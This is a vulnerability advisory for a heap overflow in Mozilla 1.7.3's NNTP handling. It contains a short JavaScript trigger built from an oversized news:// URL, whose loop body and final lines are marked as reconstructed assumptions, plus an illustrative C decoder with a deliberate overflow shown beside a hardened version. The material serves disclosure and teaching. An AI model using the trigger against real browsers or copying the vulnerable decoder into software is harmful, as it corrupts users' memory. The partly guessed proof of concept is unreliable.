A critical security vulnerability has been found in Mozilla Project code that handles the NNTP protocol.
Mozilla browser supports NNTP URLs, and a remote site can trigger a news://
connection to any server it chooses. I found a flaw in the NNTP handling code that can cause a heap overflow and allow a remote attacker to execute arbitrary code on the client machine.
Affected: Mozilla Browser <= 1.7.3 with mozilla-mail
This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan Veditz claims that it is not exploitable: "A '\' on the end will certainly trash memory, but at that point you're no longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3, the attached proof-of-concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because the Mozilla Team has not warned users.
Proof of Concept
// Build an oversized news:// URL and hand it to the browser's NNTP handler.
// Only the URL prefix and the loop headers survive on this page; the loop body,
// the trailing backslash and the final navigation are reconstructed from the
// advisory text (the quoted developer comment about a '\' on the end) and are an assumption.
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for (l = 0; l < 16376; l++)   // the page also shows a variant with 16384 iterations
    i += "A";                 // padding (assumed)
i += "\\";                    // trailing backslash (assumed; see the quoted comment above)
document.location = i;        // trigger the news:// connection (assumed)
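To make the quoted developer comment concrete, the following is an added illustration in C of the bug class it describes. It is not Mozilla's code and makes no claim about the real NNTP parser: it is a toy escape-decoder in which a lone trailing backslash makes the copy loop swallow the terminating NUL, step past the end of the input and keep copying whatever bytes happen to follow, into a destination it never bounds. The function names, the constructed input and the hardened counterpart beside it are all assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative escape-decoder (NOT Mozilla's code): copies src to dst,
 * replacing "\c" with "c". With a lone '\' as the last character, the
 * "escaped" byte is the terminating NUL itself: it is copied, the index
 * skips past the terminator, and the loop keeps reading and writing whatever
 * follows the string in memory. dst is never bounded. */
long unescape_vuln(char *dst, const char *src)
{
    long n = 0;
    for (long i = 0; src[i] != '\0'; ) {
        if (src[i] == '\\') {
            dst[n++] = src[i + 1];   /* may be the NUL: copied and skipped */
            i += 2;
        } else {
            dst[n++] = src[i++];
        }
    }
    dst[n] = '\0';
    return n;
}

/* Hardened form: reject a trailing backslash and never write past dstlen. */
long unescape_safe(char *dst, size_t dstlen, const char *src)
{
    long n = 0;
    for (long i = 0; src[i] != '\0'; ) {
        char c;
        if (src[i] == '\\') {
            if (src[i + 1] == '\0')
                return -1;           /* lone '\' at end of input */
            c = src[i + 1];
            i += 2;
        } else {
            c = src[i++];
        }
        if ((size_t)n + 1 >= dstlen)
            return -1;               /* keep room for the NUL */
        dst[n++] = c;
    }
    dst[n] = '\0';
    return n;
}

/* Constructed input (assumption): the visible string is "ab\" (3 bytes).
 * The bytes after its terminator stand in for whatever happens to sit next
 * to the string on the heap; keeping them inside one array makes the
 * over-read deterministic for this demo. */
long demo_vulnerable(void)
{
    char src[] = "ab\\\0XY";
    char dst[64];
    return unescape_vuln(dst, src);      /* copies 5 bytes from a 3-byte string */
}

long demo_hardened(void)
{
    char src[] = "ab\\\0XY";
    char dst[64];
    return unescape_safe(dst, sizeof dst, src);   /* -1: trailing '\' rejected */
}

long demo_hardened_valid(void)
{
    char dst[64];
    return unescape_safe(dst, sizeof dst, "a\\b"); /* 2: "ab" */
}

int main(void)
{
    printf("vulnerable decoder copied %ld bytes from a 3-byte string\n", demo_vulnerable());
    printf("hardened decoder on the same input returned %ld\n", demo_hardened());
    printf("hardened decoder on a valid escape returned %ld\n", demo_hardened_valid());
    return 0;
}
```

The point of the demo is the counterargument to "you're no longer reading attacker-supplied data": the bytes copied after the terminator are still whatever the attacker managed to place adjacent on the heap, and the unbounded write into dst is where the overflow happens. The hardened version fails closed on both conditions.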